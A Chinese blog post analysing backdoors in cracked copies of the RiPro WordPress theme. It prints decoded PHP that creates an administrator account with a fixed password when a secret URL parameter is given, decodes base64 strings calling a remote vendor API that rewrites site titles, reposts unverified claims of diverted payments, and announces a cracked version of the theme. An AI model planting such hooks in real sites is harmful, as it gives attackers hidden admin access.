自从ripro日主题后门事件爆发之后,大家都在找ripro去后门版,其实不难找到。
待会呢,也就是下一篇文章,小程序源码网站长就给大家分享一下本站在用的ripro破解授权版。
这篇文章主要是给大家讲ripro4.8版本漏洞门事件和分享一下修复后门后的正常文件。
首先给大家分享一下一个站长的扫毒以及ripro查后门过程。
首先是下载后用D盾扫描ripro主题后门在哪个文件里面:
发现有加密文件,用Notepad++查看
破解混淆加密后得到源文件
经查看发现后门代码
01
01
02
03
04
05
06
07
08
09
10
11
12
|
add_action( 'wp_head' , 'wp_backdoor' ); function wp_backdoor() { if (md5( $_GET [ 'backdoor' ]) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require ( 'wp-includes/registration.php' ); if (!username_exists( 'backdoor' )) { //检测是否存在backdoor账户 $user_id = wp_create_user( 'backdoor' , '123456' ); //创建账户 $user = new WP_User( $user_id ); $user ->set_role( 'administrator' ); //设置为管理员权限 } } } |
使用http(s)://你的域名/?backdoor=go访问,
自动创建用户名为backdoor密码为123456的管理员账户
本地测试
成功登录后台
推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
毕竟没有真正免费的午餐。解密后文件在附件,原来的教程:https://www.52pojie.cn/thread-1074873-1-1.html【无文件下载,建议本站下载】
然后贴吧还有人爆料疑似正版ripro后门【当然空口无凭】:
今天中午,用户反应已经付了钱,但是没有购买成功,然后我查了一下zfb没有入账,订单记录是未付款,但是用户截图给我显示是支付成功了的,但是收款方变成了榆林市大象果蔬有限责任公司,应该是收款信息被改了,现在正在查这个公司是个什么鬼,有没有也遇到这种情况的啊。
最后,我用的是正版,没有加群,找官方问,一直没回复。
近期ripro主题大火,很多喜欢捣鼓折腾的小伙伴就加入到了折腾ripro主题的队伍中来,美来美去,折腾的不亦乐乎。不过也有令他们很头疼的事情莫过于因为使用了开心版,除了会被加入后门外还会时常被修改网站标题为vip.ylit.cc。不懂技术的小白们顿时抓了狂,就感觉是整个网站都被黑了一样。实则是ripro开发者油条在主题程序内留了一个小尾巴,让程序在有意无意中来恶心一下使用开心版的小白们。最好的解决办法就是去官方购买正版,支持油条。
如果你既想当小程序源码网站长又想立牌坊,不妨接着看看一下解决的思路,动手学习试一下。
在\ripro\inc\codestar-framework\classes\目录下,有两个文件options.class.php和metabox.class.php,这里面就暗藏恶心人的小尾巴。
首先来看options.class.php文件,看图中红框中的两部分代码,是不是不知是啥东西呢?
搜刮来告诉你,这两块内容都是经base64加密后的代码,看到图中base64_decode了吗?搜刮来科普下,base64_decode与base64_encode是php中的加密解密函数,base64_encode是加密,而base64_decode是解密。so,让我们来看一下这两段代码解密后是啥东东?
base64_decode(’aHR0cHM6Ly92aXAueWxpdC5jYy93cC1jb250’)解密后: https://vip.ylit.cc/wp-cont
base64_decode(’ZW50L3BsdWdpbnMvcmlwcm8tYXV0aC9hcGkvdjEucGhw=’)解密后:ent/plugins/ripro-auth/api/v1.php
是不是发现了什么? 两块数据合在一起:https://vip.ylit.cc/wp-content/plugins/ripro-auth/api/v1.php,这就是触发修改标题的api。
那页面中还有这样的加密内容吗?
是不是发现还有两处呢?再来看看解密后是啥东东.
base64_decode(‘UmlQcm8=’) 解密后是RiPro
base64_decode(‘YmxvZ25hbWU=’)解密后是blogname 。
是不是能明白什么呢?!
看完options.class.php文件,用同样的方法再看一下metabox.class.php文件,搜刮就不在这赘述啦。
如果你足够聪明,看完后你就会恍然大悟,原来恶心人的问题是在这里啊!!!至于如何解决自行动脑思考了哟。
还是那句话,要想彻底解决,最好的办法就是去官方购买正版,支持油条!
另外搜刮要说一下,在ripro主题里,油条不仅在这里预留了一些小尾巴,在其它文件里面也预留了一些用于检测用户id等信息的小尾巴,所以你如果要安心使用或运营,强烈建议你去官方购买正版,支持油条!
最后附上贴吧一条不知道真假的关于ripro后门事件的帖子:
用wp做了网站,感觉搜索引擎更喜欢wp程序,发了文章收录的都很好,所以就考虑买了个主题模板.
百度搜索wp主题先看中了Rizhuti主题,联系了作者油条,作者细心的讲答,大概意思就是这个模板怎么怎么好。
不过单看主题功能样式等确实也不错,而且还号称几百块就能使用三个主题(不过购买了以后实际上就一个主题一直在更新,其他的有BUG看样子也不会升级了)
既然已经购买了那么就没有后悔药了,所以选择一直还保持更新的ripro主题使用。
我不是太懂,更何况这个主题也不是我做的,什么加密不加密的我也都没管,我想毕竟是购买的正版主题,也不是所谓的盗版怎么会留有后门呢?
但是我这个人也比较谨慎,我测试的这段时间源码资源都不值钱的,仅仅是试运营而已,正是我这谨慎的测试才知道那么一点事情,被人骂了一顿,说实在的我真的是不在乎那一块钱,看截图。
我的网站给别人做了嫁衣,居然我没收到钱他也能下载?这也太高端了吧?这让人根本就没法察觉!而且我自己测试的时候支付确实是到了我自己的账户,也有几个订单确实是到了我的账户,难道用
户为了一块钱跟我犟?还是选择性的支付跳转到他那?
我的支付对接的都是官方支付,不是什么第三方支付(因为我拍第三方支付跑路),也避免因为第三方支付而漏单什么的。
这个事我也没找过作者,找了也没用,那小偷偷了东西还会大声告诉失主就是他偷的?那也太张狂了。
我上网搜了关于这个主题后门什么,看看能不能修复或者删除啥的,毕竟是花了几百块.
网上搜的都是关于说后门的文章,没说怎么解决.
可能有的人要说问作者,其实你要是这么想的,我就觉得有些可笑了。下面给你看看这些还没有问关于这方面的问题而被作者发到他的群里一顿羞辱的。
我就不一一截图了,问他不是自取其辱吗?
自己网站放的多交100能体验内测版本,你要是心情不好不愿意回答,不搭理他不就完事了!还要发到群里骂人家是狗,然后其他人配合着骂,说什么智障什么的都有,你说你要是问他不是找气受吗?
想要退钱?好像不能,世界上哪有后悔药,不信的话买过的就去问问他能不能退钱,肯定又是被发到他的群给你一顿羞辱,你要是敢跟他犟,我想只有一个后果-被踢.
所以我没问他,也没在群里大声嚷嚷,认了,对于我,这种被坑的事也不是一件两件了,像我这种人通常被世人称为“人傻钱多”
如果你也想做这种人不妨花个几百块买个。
看了这篇帖子后你还敢买吗?
本站为避免不必要的纷争,分享的所有资源中一切可能有版权风险的资源将全部转载自第三方网站或平台,站长只为大家提供相关资源的介绍和跳转引导。 因可能有疏忽大意,所以如有遗漏资源侵犯了您的合法权利,请联系站长删除。
【小程序源码网资源下载使用说明】:
本站所分享的一切QQ小程序源码,thinkphp整站源码,微信小程序源码,图文教程等资源仅供用户学习参考使用,任何人不得作其他用途,违者自行承担所有责任。
【小程序源码网毫无人看的介绍】:
本站又称Z站,原名贼娘网,开站于2018年,换过三任站长,目前站长是第四任站长,本站是一个主要分享免费开源小程序源码/网站源码/免费素材/教程资源的网站,主要小程序资源有用于学习的小程序源码,也有正版原创可商用的小程序源码,是一个公益博客型网站。
【小程序源码网原创源码版权申明】:
未经小程序源码网许可,任何人不得擅自使用本站原创首发源码进行商业行为(除本站VIP用户在期限内,版权无使用限制),否则将依法承担相应赔偿责任。
【小程序源码网转载文章版权申明】:
本站所转载的QQ小程序或微信小程序源码与其他资源仅供学习,任何人不得作其他用途,违者自行承担所有责任。
【小程序源码网站长最后的屁话】:
如有您认为本站有任何侵犯您合法权益的文章,或者您有什么疑问需求,欢迎联系站长QQ,站长24小时在线,备注公司名称和源码版权问题或者需要小程序定制开发等站长业务类型可急速处理,如果您只是交流小程序的一些开发问题或源码问题可以加入QQ群讨论,就不用加站长啦,对于白嫖党,QQ群才是处理问题的天堂,当然站长也欢迎大家骚扰~
小程序源码网 » ripro日主题后门事件与ripro破解授权版和ripro去后门版以及ripro后门文件